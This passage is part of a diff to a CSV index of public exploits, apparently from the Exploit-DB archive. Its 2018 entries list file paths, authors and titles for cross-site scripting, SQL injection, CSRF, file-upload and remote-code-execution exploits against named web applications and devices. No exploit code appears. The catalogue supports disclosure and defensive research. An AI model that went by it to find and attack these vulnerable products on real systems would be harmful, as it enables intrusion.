CMS 4.1.0 - 'form[qq_10]' Cross-Site Scripting",2018-05-13,jiguang,webapps,php, 44618,exploits/php/webapps/44618.txt,"WUZHI CMS 4.1.0 - 'tag[pinyin]' Cross-Site Scripting",2018-05-13,jiguang,webapps,php, -44621,exploits/php/webapps/44621.txt,"Monstra CMS 3.0.4 - Remote Code Execution",2018-05-14,JameelNabbo,webapps,php, 44622,exploits/php/webapps/44622.txt,"XATABoost 1.0.0 - SQL Injection",2018-05-14,MgThuraMoeMyint,webapps,php, 44623,exploits/multiple/webapps/44623.txt,"JasperReports - (Authenticated) File Read",2018-05-03,"Hector Monsegur",webapps,multiple, 44624,exploits/php/webapps/44624.txt,"MyBB Admin Notes Plugin 1.1 - Cross-Site Request Forgery",2018-05-16,0xB9,webapps,php, @@ -39667,7 +39665,7 @@ id,file,description,date,author,type,platform,port 44737,exploits/php/webapps/44737.txt,"WordPress Plugin Peugeot Music - Arbitrary File Upload",2018-05-23,Mr.7z,webapps,php, 44739,exploits/asp/webapps/44739.txt,"ASP.NET jVideo Kit - 'query' SQL Injection",2018-05-24,AkkuS,webapps,asp, 44746,exploits/php/webapps/44746.txt,"PaulNews 1.0 - 'keyword' SQL Injection / Cross-Site Scripting",2018-05-24,AkkuS,webapps,php, -44747,exploits/java/webapps/44747.txt,"OpenDaylight - SQL Injection",2018-05-24,JameelNabbo,webapps,java, +45336,exploits/hardware/webapps/45336.txt,"Tenda ADSL Router D152 - Cross-Site Scripting",2018-09-05,"Sandip Dey",webapps,hardware, 44748,exploits/php/webapps/44748.html,"Timber 1.1 - Cross-Site Request Forgery",2018-05-24,L0RD,webapps,php, 44749,exploits/linux/webapps/44749.txt,"Honeywell XL Web Controller - Cross-Site Scripting",2018-05-24,t4rkd3vilz,webapps,linux, 44751,exploits/linux/webapps/44751.txt,"EU MRV Regulatory Complete Solution 1 - Authentication Bypass",2018-05-24,Veyselxan,webapps,linux, @@ -39699,7 +39697,6 @@ id,file,description,date,author,type,platform,port 44793,exploits/php/webapps/44793.txt,"Sitemakin SLAC 1.0 - 'my_item_search' SQL Injection",2018-05-29,"Divya Jain",webapps,php, 44794,exploits/hardware/webapps/44794.txt,"NUUO NVRmini2 / NVRsolo - Arbitrary File Upload",2018-05-29,M3@Pandas,webapps,hardware, 44795,exploits/php/webapps/44795.txt,"MyBB ChangUonDyU Plugin 1.0.2 - Cross-Site Scripting",2018-05-29,0xB9,webapps,php, -44796,exploits/java/webapps/44796.txt,"Pivotal Spring Java Framework < 5.0 - Remote Code Execution",2018-05-29,JameelNabbo,webapps,java, 44799,exploits/php/webapps/44799.txt,"Facebook Clone Script 1.0.5 - 'search' SQL Injection",2018-05-29,L0RD,webapps,php, 44800,exploits/php/webapps/44800.txt,"Facebook Clone Script 1.0.5 - Cross-Site Request Forgery",2018-05-29,L0RD,webapps,php, 44801,exploits/java/webapps/44801.txt,"SearchBlox 8.6.6 - Cross-Site Request Forgery",2018-05-30,"Ahmet Gurel",webapps,java,